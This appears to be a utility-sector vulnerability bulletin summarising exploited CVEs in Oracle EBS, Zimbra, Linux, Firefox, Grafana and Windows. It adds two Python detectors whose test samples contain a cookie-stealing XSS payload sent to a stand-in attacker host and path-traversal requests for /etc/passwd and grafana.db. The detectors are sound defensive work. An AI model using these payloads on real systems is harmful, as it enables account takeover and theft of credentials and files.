(TLP:CLEAR) Weekly Vulnerabilities to Prioritize – October 9, 2025
Created: Thursday, October 9, 2025 - 14:46
Categories: Cybersecurity, Federal & State Resources, Security Preparedness
The vulnerabilities below have been identified by WaterISAC analysts as important for water and wastewater utilities to prioritize in their vulnerability management efforts. WaterISAC shares critical vulnerabilities that affect widely used products and may be under active exploitation. WaterISAC draws additional awareness in alerts and advisories when vulnerabilities are confirmed to be impacting, or have a high likelihood of impacting, water and wastewater utilities. Members are encouraged to review these vulnerabilities regularly; many of them are also listed in CISA’s Known Exploited Vulnerabilities (KEV) Catalog.
Oracle E-Business Suite Zero-Day Vulnerability
CVSS Score: 9.8
CVE: CVE-2025-61882
Description: Oracle released an advisory for a zero-day vulnerability that was exploited in the wild before a patch was available. The Clop ransomware group has been reported exploiting it in a data-theft extortion campaign against Oracle E-Business Suite customers. The vulnerability is in the Oracle Concurrent Processing product of Oracle E-Business Suite (component: BI Publisher Integration). Affected supported versions are 12.2.3 through 12.2.14. This easily exploitable vulnerability allows an unauthenticated attacker with network access via HTTP to compromise Oracle Concurrent Processing, and successful exploitation can result in takeover of Oracle Concurrent Processing. Because exploitation preceded the fix, patching alone is not sufficient: utilities with E-Business Suite reachable over HTTP should also review those instances for signs of compromise using the indicators of compromise published in Oracle’s alert. CISA has added this vulnerability to its KEV catalog.
Source: https://www.oracle.com/security-alerts/alert-cve-2025-61882.html
Additional Reading:
- CVE-2025-61882: Frequently Asked Questions About Oracle E-Business Suite (EBS) Zero-Day and Associated Vulnerabilities
- Dozens of Oracle customers impacted by Clop data theft for extortion campaign
Synacor Zimbra Collaboration Suite (ZCS) Cross-site Scripting Vulnerability
CVSS: N/A
CVE: CVE-2025-27915
Description: An issue was discovered in Zimbra Collaboration (ZCS) 9.0, 10.0 and 10.1. A stored cross-site scripting (XSS) vulnerability exists in the Classic Web Client due to insufficient sanitization of HTML content in ICS (calendar invite) files. When a user merely views an e-mail message containing a malicious ICS entry, no click required, the embedded JavaScript executes via an ontoggle event handler inside a <details> tag. This lets the attacker run arbitrary JavaScript within the victim’s session and perform unauthorized actions on the account, such as creating e-mail filters that redirect messages to an attacker-controlled address or exfiltrating mailbox data. CISA has added this vulnerability to its KEV catalog.
Source: https://wiki.zimbra.com/wiki/Security_Center
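The following is an added example, not code from the original bulletin or from Zimbra: a small Python scanner that unfolds an iCalendar (ICS) body and flags HTML event-handler attributes (ontoggle and the like) inside property values, the payload shape the advisory describes. The calendar bodies, the attacker.invalid host and the property names are constructed for the example. It also shows why a per-line grep of the raw attachment is not enough: RFC 5545 folds long lines at arbitrary points, so the handler name can be split across a line break.

```python
import re

# Constructed sample (not a real capture): a minimal iCalendar body whose
# DESCRIPTION carries the advisory's payload shape, a <details> element with an
# ontoggle handler. The property is folded per RFC 5545 (CRLF followed by a
# single space), and the fold deliberately lands inside "ontoggle".
SAMPLE_ICS = (
    "BEGIN:VCALENDAR\r\n"
    "VERSION:2.0\r\n"
    "BEGIN:VEVENT\r\n"
    "UID:constructed-example@example.invalid\r\n"
    "SUMMARY:Quarterly maintenance window\r\n"
    "DESCRIPTION:Agenda attached <details open onto\r\n"
    " ggle=\"fetch('https://attacker.invalid/?c='+document.cookie)\">x</details>\r\n"
    "END:VEVENT\r\n"
    "END:VCALENDAR\r\n"
)

# Benign invite for comparison (constructed); plain formatting tags are fine.
CLEAN_ICS = (
    "BEGIN:VCALENDAR\r\n"
    "VERSION:2.0\r\n"
    "BEGIN:VEVENT\r\n"
    "UID:clean-example@example.invalid\r\n"
    "SUMMARY:Pump station walkthrough\r\n"
    "DESCRIPTION:Meet at the <b>north</b> gate\\, bring PPE.\r\n"
    "END:VEVENT\r\n"
    "END:VCALENDAR\r\n"
)

# An HTML tag carrying an on* attribute (ontoggle=, onload=, onerror=, ...).
EVENT_HANDLER_RE = re.compile(
    r"<\s*([a-zA-Z][\w-]*)[^>]*\s(on[a-zA-Z]+)\s*=", re.IGNORECASE
)


def unfold(ics_text):
    """Undo RFC 5545 line folding: a physical line that starts with a space
    or tab continues the previous content line."""
    lines = []
    for raw in ics_text.splitlines():
        if raw[:1] in (" ", "\t") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return lines


def split_content_line(line):
    """Split 'NAME;PARAM=...:value' at the first colon outside double quotes
    (parameter values such as ALTREP="http://..." may contain colons).
    Returns (NAME, value) with parameters dropped, or None if malformed."""
    in_quotes = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_quotes = not in_quotes
        elif ch == ":" and not in_quotes:
            name = line[:i].split(";", 1)[0].upper()
            return name, line[i + 1:]
    return None


def find_html_event_handlers(ics_text):
    """Return [(PROPERTY, tag, handler), ...] for every HTML event-handler
    attribute found in any property value after unfolding."""
    hits = []
    for line in unfold(ics_text):
        parsed = split_content_line(line)
        if not parsed:
            continue
        name, value = parsed
        for m in EVENT_HANDLER_RE.finditer(value):
            hits.append((name, m.group(1).lower(), m.group(2).lower()))
    return hits


def naive_line_grep(ics_text, needle):
    """What a per-line grep of the raw attachment sees: folding can hide it."""
    return any(needle.lower() in line.lower() for line in ics_text.splitlines())


if __name__ == "__main__":
    print(find_html_event_handlers(SAMPLE_ICS))
    print(find_html_event_handlers(CLEAN_ICS))
    print(naive_line_grep(SAMPLE_ICS, "ontoggle"))
```

The scanner is a triage aid for mail-gateway or mailbox sweeps, not a substitute for the vendor fix; any hit warrants checking the recipient’s account for newly created filters and forwarding rules, which is the post-exploitation action the advisory describes.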
Linux Kernel Heap Out-of-Bounds Write Vulnerability
CVSS: 8.3
CVE: CVE-2021-22555
Description: A heap out-of-bounds write affecting Linux since v2.6.19-rc1 was discovered in net/netfilter/x_tables.c. It allows a local attacker to gain privileges or cause a denial of service (via heap memory corruption), and the vulnerable code path is reachable by an unprivileged user through user namespaces, which is what makes it usable from an ordinary account or a container. Although the fix dates from 2021, its addition to the KEV catalog indicates current exploitation; hosts running unpatched kernels should be updated, and where patching lags, disabling unprivileged user namespaces removes the unprivileged trigger path. CISA has added this vulnerability to its KEV catalog.
Source: https://github.com/google/security-research/security/advisories/GHSA-xxx5-8mvq-3528
Mozilla Multiple Products Remote Code Execution Vulnerability
CVSS: N/A
CVE: CVE-2010-3765
Description: Mozilla Firefox 3.5.x through 3.5.14 and 3.6.x through 3.6.11, Thunderbird 3.1.x before 3.1.6 and 3.0.x before 3.0.10, and SeaMonkey 2.x before 2.0.10, when JavaScript is enabled, allow remote attackers to execute arbitrary code via vectors related to nsCSSFrameConstructor::ContentAppended, the appendChild method, incorrect index tracking, and the creation of multiple frames, which triggers memory corruption, as exploited in the wild in October 2010 by the Belmoo malware. These releases are long out of support; any host still running them should be treated as an unmanaged legacy system and replaced rather than patched. CISA has added this vulnerability to its KEV catalog.
Source: https://blog.mozilla.org/security/2010/10/26/critical-vulnerability-in-firefox-3-5-and-firefox-3-6/
Grafana Path Traversal Vulnerability
CVSS Score: 7.5
CVE: CVE-2021-43798
Description: Grafana is an open-source platform for monitoring and observability. Grafana versions 8.0.0-beta1 through 8.3.0 (except for patched versions) are vulnerable to directory traversal, allowing an unauthenticated request to read arbitrary local files, such as Grafana’s configuration and SQLite database, and disclose sensitive information. The vulnerable URL path is `<grafana_host_url>/public/plugins/<plugin-id>/`, where `<plugin-id>` is the plugin ID for any installed plugin; because Grafana ships with many bundled plugins, a default installation is exploitable. At no time has Grafana Cloud been vulnerable. Users are advised to upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1. The GitHub Security Advisory contains more information about vulnerable URL paths, mitigation, and the disclosure timeline. CISA has added this vulnerability to its KEV catalog.
Source: https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
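The following is an added example, not code from the original bulletin or from the Grafana project: a Python scan over web-server access logs that flags requests to `/public/plugins/<plugin-id>/` whose path, after percent-decoding and normalization, resolves outside the plugin directory, the shape of exploitation described above. The log lines, client addresses, plugin IDs and file paths are constructed for the example; a real deployment would feed it the reverse-proxy or Grafana access log in front of the affected hosts.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

# Constructed sample access-log lines (common log format); not real traffic.
# Lines 3 and 4 use '..' segments, plain and percent-encoded, under a bundled
# plugin ID to escape /public/plugins/<plugin-id>/.
SAMPLE_LOG = """\
10.0.0.5 - - [09/Oct/2025:14:01:02 +0000] "GET /public/plugins/grafana-clock-panel/module.js HTTP/1.1" 200 4112
10.0.0.9 - - [09/Oct/2025:14:01:07 +0000] "GET /api/health HTTP/1.1" 200 71
203.0.113.7 - - [09/Oct/2025:14:02:11 +0000] "GET /public/plugins/alertlist/../../../../../../../../etc/passwd HTTP/1.1" 200 1823
203.0.113.7 - - [09/Oct/2025:14:02:15 +0000] "GET /public/plugins/prometheus/..%2F..%2F..%2F..%2F..%2Fvar%2Flib%2Fgrafana%2Fgrafana.db HTTP/1.1" 200 921600
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
PLUGIN_DIR_RE = re.compile(r"^/public/plugins/(?P<plugin>[^/]+)/")


def decode_path(target):
    """Drop the query string and percent-decode the request path once.
    Traversal depends on '..' segments reaching the server un-normalized,
    so inspect the raw request target as logged, not a cleaned-up copy."""
    return unquote(urlsplit(target).path)


def plugin_traversal(path):
    """Return (plugin_id, resolved_path) when a /public/plugins/<id>/ request
    resolves outside that plugin's directory, else None."""
    m = PLUGIN_DIR_RE.match(path)
    if not m:
        return None
    plugin = m.group("plugin")
    base = f"/public/plugins/{plugin}/"
    # posixpath.normpath collapses '..' the way a filesystem would; extra
    # '..' above the root are discarded, matching how the exploit reaches
    # e.g. /etc/passwd regardless of how many segments it used.
    resolved = posixpath.normpath(path)
    inside = resolved == base.rstrip("/") or resolved.startswith(base)
    return None if inside else (plugin, resolved)


def scan_log(log_text):
    """Return one record per traversal attempt found in the log text."""
    hits = []
    for line in log_text.splitlines():
        req = REQUEST_RE.search(line)
        if not req:
            continue
        found = plugin_traversal(decode_path(req.group("target")))
        if found:
            plugin, resolved = found
            hits.append({
                "plugin": plugin,
                "resolved": resolved,
                "status": int(req.group("status")),
                "line": line,
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['plugin']:>12}  {hit['status']}  {hit['resolved']}")
```

A 200 response on a flagged request is the strong signal: it means the file was served and the host should be treated as compromised (rotate the Grafana admin password, data-source credentials and any secrets in grafana.ini), not merely patched. Note that some clients and proxies normalize `..` before forwarding, so absence of hits in a proxy log does not prove the Grafana host itself never saw the raw path.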
Multiple Microsoft Vulnerabilities in Windows and Internet Explorer
CVE: CVE-2010-3962, CVE-2011-3042, CVE-2013-3918, CVE-2021-43226
Description: Multiple vulnerabilities in Microsoft Windows and Internet Explorer are known to be currently exploited by threat actors. CISA has added these vulnerabilities to its KEV catalog.
Source: https://www.cisa.gov/news-events/alerts/2025/10/06/cisa-adds-seven-known-exploited-vulnerabilities-catalog
